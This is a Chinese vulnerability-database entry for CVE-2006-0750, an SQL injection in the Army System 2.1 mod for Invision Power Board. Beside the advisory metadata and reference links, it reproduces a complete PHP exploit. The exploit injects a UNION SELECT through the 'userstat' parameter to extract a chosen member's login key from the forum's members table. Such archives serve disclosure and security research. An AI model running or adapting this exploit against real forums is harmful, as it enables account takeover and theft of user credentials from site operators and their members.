IPB Army System Army.PHP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109745 漏洞类型 SQL注入
发布时间 2006-02-13 更新时间 2007-09-04
CVE编号 CVE-2006-0750 CNNVD-ID CNNVD-200602-257
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1492
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-257
|漏洞详情
适用于InvisionPowerBoard(IPB)的supersmashbrothers(SSB)ArmySystem2.1.0的army.php中存在SQL注入漏洞。远程攻击者可以借助对index.php的批操作中的userstat参数执行任意SQL命令。
|漏洞EXP
<?php
/* --------------------------- EXPLOIT ---------------------------
Invision Power Board Army System Mod 2.1 SQL Injection Exploit
Tested on: Latest version (2.1.0)
Discovered on: 06.02.2006 by Alex & fRoGGz
Credits to: SecuBox Labs

PLEASE READ THIS !
The query of the SQL Injection depends about the number of fields in the sql table
We have successfully tested the exploit on a new fresh IPB 2.1.x with Army 
System Mod 2.1 installed

IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE 
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

$target = "http://site.com/forums/"; // <--- Where ?
$prefix = "ibf_"; // <--- SQL prefix ?
$id = 1; // <--- Who ?

print_r(get_infos($target,$prefix,$id));
if(!get_infos($target,$prefix,$id)) echo "failed";

function get_infos($target,$prefix,$id) {

    $inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
    $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
    $inject.= "NULL+FROM+".$prefix."members+WHERE+id=";

    $filename = $target . $inject . $id;

    $handle = fopen ($filename, "r");
        $infos = array();

        if (feof($handle)) { continue 2; }
        if ( $handle ) {
                while ( ($buffer = fgets( $handle )) )
                {
                        if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") ) {
                                $infos['md5'] = strip_tags ( fgets( $handle) );
                break;
                        }
                }
        }

    fclose ($handle);

        if (count($infos) == 1) return $infos;
        return false;
}
?>

# milw0rm.com [2006-02-13]
|参考资料

来源:XF
名称:ipb-armysystem-sql-injection(24654)
链接:http://xforce.iss.net/xforce/xfdb/24654
来源:BID
名称:16606
链接:http://www.securityfocus.com/bid/16606
来源:BUGTRAQ
名称:20060212InvisionPowerBoardArmySystemMod<=2.1SQLInjectionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/424846/100/0/threaded
来源:VUPEN
名称:ADV-2006-0561
链接:http://www.frsirt.com/english/advisories/2006/0561
来源:SECUNIA
名称:18840
链接:http://secunia.com/advisories/18840
来源:MISC
链接:http://secubox.shadock.net/Invision_Power_Board_Army_System_Mod_2.1_and_prior_SQL_Injection_Exploit.html